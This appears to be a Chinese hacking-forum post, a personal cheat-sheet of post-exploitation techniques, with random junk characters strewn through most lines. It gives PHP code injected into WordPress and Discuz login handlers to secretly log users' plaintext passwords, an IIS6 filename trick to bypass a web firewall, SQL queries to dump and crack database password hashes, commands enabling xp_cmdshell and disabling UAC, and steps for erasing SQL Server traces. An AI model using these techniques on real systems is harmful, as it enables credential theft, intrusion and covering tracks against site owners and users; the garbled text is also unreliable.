if($log_user&&$log_pwd&&$log_ip){
$ O& a) |/ b5 V+ j4 q8 \( Z@fwrite(fopen(‘pwd.txt’,”a+”),$txt);2 Z3 V) ?6 b2 K3 J8 j' K5 p4 \' u( F
}
- G  j& T! }2 B  v) @) K. a) }当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
, X& m) J( b8 @) L: @0 D, ^' P* M就是搜索case ‘login’
) E# R2 s' x7 n, |8 {3 \0 {在它下面直接插入即可,记录的密码生成在pwd.txt中,
) Z$ v. ]# s$ B' W! [. G' l其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
* m+ j8 h+ e" x- }利用II6文件解析漏洞绕过安全狗代码:
3 y- @2 ^$ S. f# D( N6 j;antian365.asp;antian365.jpg5 u) l% O6 u9 X7 m. |* B$ _" J9 B

" `# y( C* M) s* \. t各种类型数据库抓HASH破解最高权限密码!
+ a0 F$ ?! m( F1 ?; I) M# C1.sql server20001 b8 q% E' a9 G/ O
SELECT password from master.dbo.sysxlogins where name='sa'
3 n# }0 R$ J" |7 v2 J' u0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
  {+ q6 R" s5 j2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
- X- e, Z0 @- J2 Y
! d+ l# h5 r8 L0×0100- constant header
+ a& }2 k. j( B3 [34767D5C- salt" s9 a) |* }. A$ U$ e+ ^
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
. }$ A. I/ d  l' M8 i$ _2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash* s7 v* ~* e  y" s, d$ u) Q$ o. u
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash
8 m* G5 ?9 }; _0 m& k- q  JSQL server 2005:-- w; y8 q- Q5 f  |9 ?7 w& ~0 P  @
SELECT password_hash FROM sys.sql_logins where name='sa'2 z3 n2 C5 ?5 V# Z$ J: u4 _8 f, `! n
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
3 X5 R7 f( N) i2 ~% H' Y, V0×0100- constant header% K$ Y9 d6 |' E/ ~3 V) r
993BF231-salt; P4 K3 J7 v. z. L
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash9 `5 Q, _( y! G+ I/ o
crack case sensitive hash in cain, try brute force and dictionary based attacks.
9 [7 ~* M' r/ j
3 [8 c2 M; H- A8 kupdate:- following bernardo’s comments:-
' [) X0 \' }+ S1 ]use function fn_varbintohexstr() to cast password in a hex string.
/ g" U' m0 r6 ]9 me.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins9 \8 u: T' ], X( v) B5 h# @

8 J3 [, ^6 o0 E* o" Q- ]( KMYSQL:-
! E+ C8 r# Y0 d0 H( r' N3 B
: c3 T0 c' m$ W- a1 |' Q* S2 VIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.5 I3 n' l- ~3 O& D/ N+ |
# U1 `+ M( R( Y5 }. `0 v  M
*mysql  < 4.1& v( ~( x/ @$ a# [! \; Y
! u! J# E, {6 `# y: g- p- Q" g
mysql> SELECT PASSWORD(‘mypass’);
1 p! O% \( W2 t& n+——————–+$ e2 V6 z- |8 w; {: \9 ]
| PASSWORD(‘mypass’) |$ [$ U' c/ W4 p1 M5 d) V
+——————–+
- I: l, t0 @6 s5 C! G+ k# `2 c| 6f8c114b58f2ce9e   |5 K! j7 y8 K& x" M" z% a
+——————–+
" ~. w! q) e! y' h) l! `  d# a9 O7 M' w* ]0 w) ^0 L$ {
*mysql >=4.1
! Z4 ]* k! W0 W; ?8 U' U
3 J3 e' z. j0 tmysql> SELECT PASSWORD(‘mypass’);
5 Z: X& ?! e9 }  L  \+——————————————-+
. n$ d, T4 K2 K' f4 A| PASSWORD(‘mypass’)                        |
% S, o3 R( F; X+——————————————-+  s+ {5 s; J( R0 T' H; d
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |, }' f5 }' u7 ]3 L* q- L2 l6 Z. T
+——————————————-+
7 r4 R1 M+ @. e% u
) _& K) C; U, S: t  z" pSelect user, password from mysql.user
, r- a6 I7 N0 r" e, `8 kThe hashes can be cracked in ‘cain and abel’  y$ t* W' p8 O& t% F' l* H
1 X; ~9 l* i1 y( S) d3 Y! z
Postgres:-+ F& c* B2 D% r0 j
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
& P$ P3 M) y  A0 t5 y# gselect usename, passwd from pg_shadow;
4 }! y; d+ \9 h3 `usename      |  passwd
  r$ _& \2 ~5 Q+ ^) w——————+————————————-2 ]9 q9 g& H+ i6 g* p
testuser            | md5fabb6d7172aadfda4753bf0507ed4396
& U' Q: P, w0 Zuse mdcrack to crack these hashes:-
! j+ U6 {2 F9 t+ X. y$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
9 }7 h  N1 E- X; q8 y7 D
) s) J3 y, k/ ROracle:-; T6 V* y: C. e* I% u% {$ T' s
select name, password, spare4 from sys.user$+ A! t! [8 u1 ^  ]: z
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g% S6 {$ V; M9 q6 X+ B9 J
More on Oracle later, i am a bit bored….
& T/ `0 p/ J0 `+ V1 s; `# o: J6 P/ j7 |7 V$ h' z& O* L3 I$ s

: T' l8 B2 _! }( B在sql server2005/2008中开启xp_cmdshell# J% W7 t- B8 Q4 ~
-- To allow advanced options to be changed.1 b, c! ~$ }+ t$ Z
EXEC sp_configure 'show advanced options', 1
! t) {& |2 ~2 H' N% X, c* q5 SGO
1 V. C1 n9 \) ?. c' ]' H-- To update the currently configured value for advanced options.8 b; o7 {% h3 {( s% ?6 M# |. m
RECONFIGURE
$ ^! D* x4 b6 K' e& zGO
5 f( x. C5 R8 \4 N% c-- To enable the feature.0 h( H* ?4 H. s
EXEC sp_configure 'xp_cmdshell', 1  c& a5 d- s5 I4 Z0 E( k/ ~7 a
GO
& ?# C0 }7 L" R. N- X' i-- To update the currently configured value for this feature.
  C, g: ?; a4 c  {0 PRECONFIGURE- `1 p: U' E9 t$ e$ i% v, f/ P  z
GO
; u5 x$ [# Y4 ?2 ~3 m; KSQL 2008 server日志清除,在清楚前一定要备份。
) g/ n- z# ^1 {0 n如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:1 _6 Y) t6 U6 y1 l: H) T# f
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
1 k/ [0 t1 O" O7 W( _
! S5 s6 @- z# U! n+ {对于SQL Server 2008以前的版本:
0 T5 W( O% S2 @' o; P! D$ ^# USQL Server 2005:0 m8 i# `; y7 K# [6 J9 R6 o
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat7 Z( s) G7 I' A; Z& x& w
SQL Server 2000:
9 M6 ]& O; Q3 w! ?$ E2 B# g- q9 J清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft  SQL  Server\80\Tools\Client\PrefServers\相应的内容即可。9 y& j9 r) t6 h  U9 h% C
. S8 @4 W) I* t
本帖最后由 simeon 于 2013-1-3 09:51 编辑7 I* Z. h* X& w7 h( }# `0 ~% U
" I- P+ J- b7 w
0 ?" |! F# o, ^' J
windows 2008 文件权限修改
" @# G5 w" h% t1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx) M0 B& v) S1 Y! _! k% w+ \
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98; `4 Q7 ~5 L# S* ^7 I: g$ m
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
! r  x3 P% Z8 v, A/ q* z- ]9 V
Windows Registry Editor Version 5.00: U" R7 R. c* y  ~
[HKEY_CLASSES_ROOT\*\shell\runas]
& K3 Q/ l- |' K" `5 U@="管理员取得所有权"" N+ w1 R0 I  g
"NoWorkingDirectory"=""
6 E0 o/ J  n) C9 c[HKEY_CLASSES_ROOT\*\shell\runas\command]: Z5 y' j1 u& ]. Y8 ~" \
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
! k! B) Q& n& \' g# t/ M8 Y: H% c"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
, H+ |, r1 ~$ n% @1 \& t- q[HKEY_CLASSES_ROOT\exefile\shell\runas2]
$ f/ @# @8 G7 r' ?. _3 x@="管理员取得所有权"4 n( ]. ^+ F" W# `
"NoWorkingDirectory"=""# ]( c, z2 j0 r( M' z
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
( U! [$ v% @, }$ V( O@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F". o( ]  e+ S' _9 F% {3 M
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
! B! p# R( a5 S! A* h" u* {! T" E  H/ A* o, _
[HKEY_CLASSES_ROOT\Directory\shell\runas]* c0 E2 y2 l' ~1 k/ U$ u' f
@="管理员取得所有权"+ u% Z% F" f$ o
"NoWorkingDirectory"=""
: Z! u5 C; i! _- x[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
! h( [: M% ?# C$ a0 {8 e@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"7 v9 L; W6 R4 Q' J+ N" Y0 p2 o
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"- Z) [6 q: g* s% G6 D: `4 Z

! h% p4 d$ @3 d& s$ W
7 M0 z( j, u; o+ O5 swin7右键“管理员取得所有权”.reg导入
+ c, E% M- O: U. }# \# ~/ Q二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
+ _, G. ?" C2 |1 Z3 Y+ Y1 [1、C:\Windows这个路径的“notepad.exe”不需要替换
/ S( y- W  i8 ?2、C:\Windows\System32这个路径的“notepad.exe”不需要替换1 e+ K: M) H% b/ W9 W/ B# [
3、四个“notepad.exe.mui”不要管' w0 ~" ~( B+ ?0 ^6 G+ y# V
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
/ {) |* O" b% p1 wC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
5 u) R+ ~5 {. ~1 U; j$ \0 [+ H替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,5 t" W% \$ t& i- c+ M/ i
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
+ M' u4 T! j4 ^9 F! I- F% O  L. G$ Zwindows 2008中关闭安全策略: ) W' G/ }( m2 I8 i2 |- e
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f* n1 k! X/ d- z
修改uc_client目录下的client.php 在
, M* ~+ e( D7 A0 ]function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {$ J% e( G! c7 U. F
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
4 r3 f) y( z. }4 G  x% f9 g2 }" }你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
; n! I/ G6 J2 Sif(getenv('HTTP_CLIENT_IP')) {
+ m( f; y9 T* E% ?" K$onlineip = getenv('HTTP_CLIENT_IP');
, `' L% u5 f' s( Q} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
  p7 x2 E% N* ?3 t" @  o1 h$onlineip = getenv('HTTP_X_FORWARDED_FOR');1 V" |7 x1 }  ]6 T8 ~1 c4 Y0 j
} elseif(getenv('REMOTE_ADDR')) {
, [! O1 @- r$ Y$onlineip = getenv('REMOTE_ADDR');- ?9 _9 z/ j) x5 [- S
} else {
: _1 D7 a1 _9 Q& a8 s" L! t$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];6 v0 \# J8 U& i& b7 q2 e: Y5 ^3 [
}; n  I" X: Q. {2 ~
     $showtime=date("Y-m-d H:i:s");$ l5 x4 d: i; |# |! ]3 @2 A
    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
: b: T& J' |# B- x; C1 Y& D    $handle=fopen('./data/cache/csslog.php','a+');
2 v. e* H! M9 V+ ]    $write=fwrite($handle,$record);
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表